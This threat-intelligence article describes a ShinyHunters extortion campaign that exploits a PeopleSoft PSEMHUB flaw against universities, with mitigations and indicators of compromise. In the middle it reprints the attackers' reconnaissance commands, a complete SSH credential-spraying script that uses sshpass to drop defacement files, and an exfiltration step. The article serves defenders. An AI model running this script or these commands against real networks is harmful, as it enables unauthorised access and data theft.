An advanced cyber extortion campaign has been actively targeting the global higher education sector. Attributed to the threat group UNC6240 (popularly known as ShinyHunters), the campaign exploits a critical remote code execution (RCE) vulnerability within Oracle PeopleSoft infrastructure.
Identified as CVE-2026-35273, this flaw boasts a CVSS score of 9.8 and resides in the application’s Environment Management component.
Joint tracking by Mandiant and the Google Threat Intelligence Group (GTIG) revealed active scanning and exploitation between May 27, 2026, and June 9, 2026.
Because this activity preceded Oracle’s official security advisory on June 10, 2026, the threat actors successfully leveraged the flaw as a zero-day vulnerability.
Threat intelligence indicates that over 100 global organizations were exposed, with 68% of the targeted endpoints operating within the higher education sector, primarily located in the United States.
The campaign specifically targets Environment Management Hub (PSEMHUB) endpoints. By exploiting CVE-2026-35273, the threat actors bypass authentication mechanisms to execute arbitrary code on the underlying web-tier filesystem.
During early June 2026, open attacker directories on staging servers were uncovered, exposing the operational blueprints of UNC6240.
The staging environments hosted specialized command-and-control (C2) agents and automation tools designed to sustain access, pivot deep into internal networks, and orchestrate massive data exfiltration.
[Attacker Internet]
│
▼ (CVE-2026-35273 RCE Exploit)
[PeopleSoft PSEMHUB Endpoint]
│
▼ (Drops Custom Shell/Scripts)
[/tmp/[victim_abbreviation]_fanout.sh]
│
├──► SSH Credential Spraying ──► [Internal Subnet Nodes]
└──► Drops Defacement File ──► [README-IF-YOU-SEE-THIS...]
The threat actors managed five sequential IP addresses (142.11.200.186 through 142.11.200.190) running Python-based SimpleHTTP servers on port 8888.
These exposed directories contained compiled payloads, scripts, and an identical .bash_history file that provided a definitive chronological timeline of the threat group’s operations:
- Infrastructure Establishment (May 27, 2026): The attackers deployed MeshCentral (v1.1.59), an open-source remote management server, alongside the
acme-clientnpm package to dynamically provision Let’s Encrypt SSL certificates for their masquerading domain:azurenetfiles.net. - Binary Masquerading: To evade endpoint detection and response (EDR) agents, the attackers staged pre-configured Windows MeshCentral binaries named
meshagent32-azure-ops.exeandmeshagent64-azure-ops.exe. These binaries masqueraded as legitimate Microsoft Azure NetApp Files endpoints, hardcoded to call back towss://azurenetfiles.net:443/agent.ashx. An unconfigured Linux agent was also utilized, receiving execution parameters dynamically via the command line.
Once initial access to a PeopleSoft server was established, UNC6240 leveraged the MeshCentral command-line utility (meshctrl.js) to conduct internal reconnaissance. They executed targeted queries to map network topography:
Bash
# Auditing network configurations and active mounts
mount | grep -E "psoft|ps_config|nfs"
# Extracting internal subnet hosts and machine names
grep -hE '^[[:space:]]*Address=|^[[:space:]]*HostName=' /u01/app/psoft/ps_config_homes/csprd/appserv/prcs/psappsrv.cfg 2>/dev/null | head -80
Following reconnaissance, the attackers compiled a customized lateral propagation and defacement shell script, named [victim_abbreviation]_fanout.sh, via a heredoc directly into the /tmp directory.
The shell script targets internal PeopleSoft nodes by parsing local network configurations. It loops through a hardcoded array of administrative usernames and passwords to execute automated credential spraying via sshpass.
If successful, it drops an extortion marker file named README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT into critical WebLogic and Process Scheduler directories.
Below is the technical layout of the propagation script:
Bash
set +e
SRC="/u01/app/psoft/ps_config_homes/csprd/webserv/CSPRD02/README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
NAME="README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
BASE="/u01/app/psoft/ps_config_homes/csprd"
export PATH=/usr/bin:/bin
# Isolate internal PeopleSoft nodes from local hosts file
HOSTS=$(grep -E '[redacted_victim_host_pattern]|csprd[0-9]' /etc/hosts | awk '{print $2}' | grep -v '^#' | sort -u)
PWDS="[redacted_passwords]"
USERS="[redacted_usernames]"
for h in $HOSTS; do
copied=0
for u in $USERS; do
for p in $PWDS; do
sshpass -p "$p" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 $u@$h "hostname" >/dev/null 2>&1 && {
for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
sshpass -p "$p" ssh -o StrictHostKeyChecking=no $u@$h "test -d $dest && mkdir -p $dest && cat > $dest/$NAME" < "$SRC" 2>/dev/null && copied=1
done
break 2
}
done
done
done
Following propagation, stolen directories were compressed using the zstd utility (zstd -3 -T0 -o exfil.tar.zst) and exfiltrated to 176.120.22.24, the public mirror hosting the ShinyHunters Data Leak Site (DLS). On June 9, 2026, multiple compromised academic institutions officially appeared on the threat group’s leak site.
Mitigation
Organizations operating Oracle PeopleSoft applications must execute immediate defensive actions to mitigate exposure to CVE-2026-35273.
- Multi-Server Configurations: Immediately disable the Environment Management Hub (EMHub) service following Oracle’s official security alert documentation.
- Single-Server Configurations: Completely remove the PSEMHUB application from the environment.
- Network Perimeter Blocking: If the service cannot be instantly disabled, apply strict firewall or load-balancer policies to block external access to
/PSEMHUB/*(specifically/PSEMHUB/hub) and/PSIGW/HttpListeningConnector. These administrative services are completely non-breaking for standard end-user browser sessions. - WebLogic Access Logs: Scan for unauthorized HTTP
POSTrequests targeting/PSEMHUB/huband/PSIGW/HttpListeningConnectororiginating from unknown, external IP addresses. - Server-Side Request Forgery (SSRF) Detection: Audit the
HttpListeningConnectorparameters for loops or loopback strings (127.0.0.1,localhost,::1) within incoming headers, which indicate attempts to bypass web application firewall constraints. - Outbound Traffic Anomalies: Monitor firewall netflow records for unauthorized outbound SMB traffic (TCP Port 445) leaving PeopleSoft application hosts. The exploit chain attempts to force outbound connections to harvest Windows machine-account NetNTLM hashes.
Regularly verify filesystem integrity across the web tier using the following matrix:
| Targeted Directory / Path | Indicator Object | Technical Context |
<PS_CFG_HOME>/webserv/<domain>/applications/peoplesoft/PSEMHUB.war/ | Unauthorized .jsp files | Webshell persistence mechanisms dropped via RCE exploit |
.../PSEMHUB.war/envmetadata/transactions/ | Unexpected folders or binary drops | Staging area for malicious actor payloads and tools |
.../PSEMHUB.war/ | Folders named logs, persistantstorage, or scratchpad | Non-standard directories created during exploitation phases |
<docroot>/envmetadata/data/environment/ | Modified or recent .xml files | Exploitation of XMLDecoder to force unauthorized code execution upon system reboot |
- Staging IPs:
142.11.200.186,142.11.200.187,142.11.200.188,142.11.200.189,142.11.200.190 - Exfiltration Infrastructure Mirror:
176.120.22.24 - C2 Domain:
azurenetfiles.net - File Hashes (SHA-256):
.bash_history:2ab684d93c1553fad87041b4dea97188a97e78589deee2a7bacff905564f3a35meshagent64-azure-ops.exe:f02a924c9ff92a8780ce812511341182c6b509d45bc59f3f7b522e37225d24fcmeshagent32-azure-ops.exe:c7e9332731b06644fc73e0046a2a89eaa59b09f54250e9bd622467187351711f
Applying the latest patches from the Oracle Critical Patch Update advisory remains the most effective long-term defense against this cyber extortion campaign.
FAQ
Q1: What is the primary vulnerability exploited by ShinyHunters in this campaign?
A1: The threat group exploits CVE-2026-35273, a critical remote code execution flaw (CVSS 9.8) within Oracle PeopleSoft’s Environment Management Hub component.
Q2: Why was higher education targeted significantly more than other sectors?
A2: Higher education environments widely deploy Oracle PeopleSoft infrastructure and frequently feature expansive networks with exposed public-facing administrative endpoints.
Q3: Will blocking external network access to /PSEMHUB/ disrupt normal end-user portal operations?
A3: No, restricting this endpoint is completely non-breaking because it serves administrative, system-to-system communications and is separate from core student or employee portal experiences.
Q4: How does the threat actor’s custom fanout script spread across internal networks?
A4: The script parses the local hosts file for internal nodes and conducts automated SSH credential-spraying using a hardcoded list of administrative credentials.
Site: thecybrdef.com
For more insights and updates, follow us on Google News, Twitter, and LinkedIn.
About the Author
